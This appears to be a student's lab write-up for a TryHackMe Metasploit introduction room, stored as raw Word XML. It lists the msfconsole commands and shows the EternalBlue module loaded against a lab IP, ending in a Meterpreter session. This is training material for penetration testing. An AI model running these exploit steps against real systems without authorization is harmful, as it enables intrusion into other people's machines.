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46A2" w14:textId="760482DB" w:rsidR="002E726A" w:rsidRPr="00885E6D" w:rsidRDefault="002E726A" w:rsidP="002E726A"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6A4ED1">
        <w:t>46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062E89AD" w14:textId="6DBD08C9"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METASPLOIT-INTRODUCTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426456A3" w14:textId="77777777" w:rsidR="002E726A" w:rsidRDefault="002E726A" w:rsidP="002E72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D270" wp14:editId="7D2EEE9F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10C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E5C8C2D" w14:textId="77777777" w:rsidR="002E726A" w:rsidRPr="00885E6D" w:rsidRDefault="002E726A" w:rsidP="002E726A"/>
    <w:p w14:paraId="5F7A4F78" w14:textId="77777777"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5BDC4100" w14:textId="77777777" w:rsidR="002E726A" w:rsidRPr="002E726A" w:rsidRDefault="002E726A" w:rsidP="002E726A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="002E726A">
        <w:t>To understand the basics of the Metasploit Framework and learn how to use it for identifying, exploiting, and gaining access to vulnerable systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CA8823" w14:textId="77777777"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3F58F0AB" w14:textId="2E9FD78E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>Start the TryHackMe machine and connect to the VPN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5215B653" w14:textId="7F4BD808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Metasploit Framework using the msfconsole command in the terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26005EB4" w14:textId="1BBBAACB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vsftpd).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773DDCFB" w14:textId="3A64CFC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[module_path].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B536EDD" w14:textId="251224DA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14:paraId="6AD0DA7E" w14:textId="26B73B0B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14:paraId="695AF52E" w14:textId="05C8818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post-exploitation options.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C54EF51" w14:textId="77EFEB5C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14:paraId="160F27B0" w14:textId="77777777" w:rsidR="002E726A" w:rsidRPr="002E726A" w:rsidRDefault="002E726A" w:rsidP="002E726A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="002E726A">
        <w:t>Metasploit is the most widely used exploitation framework for penetration testing and vulnerability research. It supports all phases of a pentest — from information gathering to post-exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7253FE" w14:textId="75B99A5B"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14:paraId="630D14EF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Pro: Commercial version with a graphical interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E8F09D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Framework: Free, open-source, command-line version (focus of this room).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E637E12" w14:textId="6C6397E2"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14:paraId="19E83383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msfconsole: The primary command-line interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0CDA30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14:paraId="141B6D15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Tools: Standalone utilities like msfvenom, pattern_create, and pattern_offset.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B348C07" w14:textId="43C698A3"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14:paraId="29ECDABC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14:paraId="7E90313D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Gain a solid foundation for using Metasploit effectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7379EF35" w14:textId="77777777"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Comfortably navigate and use the Metasploit command-line environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF328A8" w14:textId="7817DAF4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MAJOR COMPONENTS OF METASPLOIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454D0DF1" w14:textId="259BF78A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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002E726A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Start Console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381CADD8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F460266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BD6CF1B" w14:textId="77777777" w:rsidR="002E726A" w:rsidRPr="002E726A" w:rsidRDefault="002E726A" w:rsidP="002E726A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="002E726A">
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD426A8" w14:textId="0647E9E0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</w:t>
      </w:r>
      <w:r w:rsidRPr="002E726A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Search Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DBF1F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BDD8E95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4DB3B069" w14:textId="77777777" w:rsidR="002E726A" w:rsidRPr="002E726A" w:rsidRDefault="002E726A" w:rsidP="002E726A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="002E726A">
        <w:t>search &lt;keyword&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01839486" w14:textId="70B8B05C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</w:t>
      </w:r>
      <w:r w:rsidRPr="002E726A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE58D2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4640A87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5CF48C5C" w14:textId="77777777" w:rsidR="002E726A" w:rsidRPr="002E726A" w:rsidRDefault="002E726A" w:rsidP="002E726A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="002E726A">
        <w:t>use &lt;module_path&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB9872B" w14:textId="3BA37E85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</w:t>
      </w:r>
      <w:r w:rsidRPr="002E726A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Show Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64834167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A7102E2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C88523E" w14:textId="77777777" w:rsidR="002E726A" w:rsidRPr="002E726A" w:rsidRDefault="002E726A" w:rsidP="002E726A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="002E726A">
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C812EE" w14:textId="1B818D1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 </w:t>
      </w:r>
      <w:r w:rsidRPr="002E726A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Set Values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8AF86B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20691769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AB3D841" w14:textId="77777777" w:rsidR="002E726A" w:rsidRPr="002E726A" w:rsidRDefault="002E726A" w:rsidP="002E726A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="002E726A">
        <w:lastRenderedPageBreak/>
        <w:t>set RHOSTS &lt;target_ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607C2FE5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set RPORT &lt;port&gt;      # if needed  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17464ED1" w14:textId="77777777" w:rsidR="002E726A" w:rsidRPr="002E726A" w:rsidRDefault="002E726A" w:rsidP="002E726A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="002E726A">
        <w:t>set PAYLOAD &lt;payload&gt; # if needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4A6D9B" w14:textId="77C94F95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</w:t>
      </w:r>
      <w:r w:rsidRPr="002E726A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Run Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655BD0A9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E60DF41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5617DC1" w14:textId="77777777" w:rsidR="002E726A" w:rsidRPr="002E726A" w:rsidRDefault="002E726A" w:rsidP="002E726A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="002E726A">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78223757" w14:textId="596ECFA6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</w:t>
      </w:r>
      <w:r w:rsidRPr="002E726A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exit Console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B209D4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702FE25A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80B9CD0" w14:textId="35C6D5D4"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14:paraId="68A9A046" w14:textId="55FDA90C"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 wp14:anchorId="7F4B1622" wp14:editId="1A543966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3C" w14:textId="5D402F16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MSFCONSOLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DB229A" w14:textId="77777777"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14:paraId="79CB28D6" w14:textId="77777777"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14:paraId="01EA911B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1ECD79EC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B96D64B" w14:textId="02B75B0B" w:rsidR="00ED6EDA" w:rsidRPr="00ED6EDA" w:rsidRDefault="00ED6EDA" w:rsidP="00ED6EDA">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00ED6EDA">
        <w:t>search apache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A7DE39" w14:textId="776B67B6" w:rsidR="00ED6EDA" w:rsidRPr="00ED6EDA" w:rsidRDefault="00ED6EDA" w:rsidP="00ED6EDA">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00ED6EDA">
        <w:t>2. Find Module Info (e.g., ssh_login)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67052EE2" w14:textId="77777777"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14:paraId="4CE48FCF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776DCDC4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A7BC2AD" w14:textId="77777777" w:rsidR="00ED6EDA" w:rsidRPr="00ED6EDA" w:rsidRDefault="00ED6EDA" w:rsidP="00ED6EDA">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00ED6EDA">
        <w:t>info auxiliary/scanner/ssh/ssh_login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E84509" w14:textId="77777777"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14:paraId="51AD2A1C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14:paraId="7B3544B7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14:paraId="459A2ACC" w14:textId="4BB4B1FC"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 wp14:anchorId="3721C7DE" wp14:editId="383D091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>Author → This answers “Who provided the module?”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3105D2" w14:textId="4BEFDB16" w:rsidR="00ED6EDA" w:rsidRPr="00ED6EDA" w:rsidRDefault="00ED6EDA" w:rsidP="00ED6EDA">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3492B267" w14:textId="44C2B54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WORKING WITH MODULES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EE8FD1" w14:textId="5127B5B1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14:paraId="16102DF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05C09CC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94B204F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use exploit/windows/smb/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6223625F" w14:textId="2A107D82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14:paraId="0281B10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44711D34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27A2E8E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set RHOSTS 10.10.165.39</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6458E62F" w14:textId="5FFCBEB9"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14:paraId="418388C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lastRenderedPageBreak/>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E23A6E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68C750AC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show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416EC574" w14:textId="04528600"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>Use setg to apply settings globally across modules:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5199CD5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1467EA36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7190DE66" w14:textId="77777777" w:rsidR="00ED6EDA" w:rsidRDefault="00ED6EDA" w:rsidP="00ED6EDA">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED6EDA">
        <w:t>setg RHOSTS 10.10.165.39</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08364422" w14:textId="44893C71"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 wp14:anchorId="5FE09051" wp14:editId="64374ACA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04E" w14:textId="16308A0E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SUMMARY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10113CE7" w14:textId="346ED9ED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Exploit:</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED6EDA">
        <w:br/>
        <w:t>Identify a vulnerable service or application on the target system. This could be discovered through scanning or research.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005A135C" w14:textId="10E5BD89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Exploit:</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED6EDA">
        <w:br/>
        <w:t>Once the vulnerability is found, select the corresponding Metasploit module (e.g., ms17_010_eternalblue) and configure its parameters (e.g., RHOSTS, RPORT, LHOST, etc.) using the set command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768F4176" w14:textId="06740DF4"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14:paraId="70CF3AC2" w14:textId="77777777" w:rsidR="00ED6EDA" w:rsidRPr="00ED6EDA" w:rsidRDefault="00ED6EDA" w:rsidP="00ED6EDA">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00ED6EDA">
        <w:t>Successfully exploited a vulnerable service using Metasploit and gained a Meterpreter session on the target system, demonstrating the power of automated exploitation tools for penetration testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AA72F3" w14:textId="77777777"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4F776C" w14:textId="77777777" w:rsidR="002E726A" w:rsidRPr="002E726A" w:rsidRDefault="002E726A" w:rsidP="002E726A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1140"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1029A191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C8A85A" w14:textId="77777777"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1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1138379704">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1382752410">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1236742844">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="100617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A"/>
    <w:rsid w:val="001D65CB"/>
    <w:rsid w:val="002E726A"/>
    <w:rsid w:val="00610DAD"/>
    <w:rsid w:val="00654C37"/>
    <w:rsid w:val="006A4ED1"/>
    <w:rsid w:val="00A003DB"/>
    <w:rsid w:val="00D25D03"/>
    <w:rsid w:val="00D552D7"/>
    <w:rsid w:val="00D77FD5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4C5"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BB45A08D-AD8A-40D7-8645-E7AE4FF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Sanjay M</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-09T14:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-09T14:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>